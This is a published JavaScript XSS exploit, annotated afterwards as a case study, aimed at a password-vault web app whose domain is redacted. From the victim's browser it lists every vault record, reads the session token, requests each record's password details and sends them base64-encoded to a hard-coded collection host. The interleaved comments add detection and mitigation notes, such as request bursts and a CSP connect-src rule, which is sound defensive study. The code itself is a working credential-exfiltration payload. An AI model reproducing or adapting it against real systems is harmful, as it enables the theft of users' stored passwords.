Created
August 20, 2018 07:26
XSS Exploit code for retrieving passwords stored in a Password Vault
//Exploit Code by Shawar Khan | |
// Case study: XSS payload against a password-vault web app. Steps 1-3 are
// same-origin API calls made from the victim's browser; step 4 is the only
// cross-origin request. The comments note what a defender can detect or
// mitigate at each step; the code itself is left exactly as published.
// Shared accumulator for the text gathered from every record response.
var data_chunks = ''; | |
// Step 1: list all vault records via the same-origin API. No `credentials`
// option is given, so fetch's default same-origin mode sends the session
// cookies -- presumably how this call is authenticated (not visible here).
// Capturing Records from API | |
fetch('https://redacted.com/api/v3/records/all').then((resp) => resp.text()).then(function(data) { | |
// Holds the records in as String | |
var allrecords = data; | |
// Parse the body and keep only its `records` member. Assigned without
// var/let, so `json_allrecords` becomes an implicit global.
json_allrecords = JSON.parse(allrecords)['records']; | |
// holds record Ids | |
var record_ids = new Array(); | |
// For each entry of `records`, take the value (index 1 of the [key, value]
// pair), its first element, and that element's `id`. Assumes every value is
// a non-empty array of record objects -- the API shape is not visible here.
Object.entries(json_allrecords).forEach(function(obj) { | |
record_ids.push((obj['1']['0']['id'])); | |
}); | |
// Step 2: fetch the session token the API expects in a `token` header on
// POSTs. Because same-origin script can read it, a token of this kind
// defends against CSRF but not against XSS; the mitigation is removing the
// injection point (contextual output encoding, a CSP without unsafe-inline).
// Capturing Session Token / Used to send POST requests | |
fetch('https://redacted.com/api/v1/session/token').then((resp) => resp.text()).then(function(data1) { | |
// Holds Session Token | |
var session_token = JSON.parse(data1)['session_token']; | |
data_chunks = ""; // Will hold a complete record | |
// Step 3: one POST per record id. Detection signal: a burst of requests to
// /api/v1/passwords/record from a single session in quick succession, which
// differs from a user opening records one at a time.
//Put loop for iterating through IDs | |
record_ids.forEach(function(record_id) { | |
// Looping through IDs and grabbing Passwords | |
var grab_password = new XMLHttpRequest(); | |
grab_password.open('POST', 'https://redacted.com/api/v1/passwords/record', true); | |
grab_password.setRequestHeader("Content-Type", "application/json;charset=UTF-8"); | |
grab_password.setRequestHeader("token", session_token); | |
// Response handler: appends the record description and the first three
// `details` values to the shared buffer. `response_password` and
// `parsed_passwords` are implicit globals (no var/let). A record with fewer
// than three details makes the `['value']` access throw inside onload.
grab_password.onload = function () { | |
response_password = this.responseText; | |
parsed_passwords = JSON.parse(response_password); | |
// Accumulating data chunks | |
data_chunks += parsed_passwords['record']['description'] | |
data_chunks += "\n"+parsed_passwords['record']['details']['0']['value'] | |
data_chunks += "\n"+parsed_passwords['record']['details']['1']['value'] | |
data_chunks += "\n"+parsed_passwords['record']['details']['2']['value']+"\n\n" | |
}; | |
grab_password.send(JSON.stringify({id:record_id,is_organization:false})); | |
}); | |
// Step 4: after a fixed 2 s delay, send whatever has accumulated so far as a
// base64 `data` query parameter in a GET to a hard-coded host (127.0.0.1 here).
// Detection: a single outbound GET with an unusually long base64 query string
// to a host outside the app's allow-list, right after the POST burst above.
// Mitigation: a CSP `connect-src` limited to the app's own origins blocks
// this cross-origin fetch; it does not block steps 1-3, which are same-origin.
setTimeout(function(){ // Submitting Data Chunks to Attacker | |
fetch('http://127.0.0.1/?data='+btoa(data_chunks)) | |
}, 2000); | |
}); | |
}); |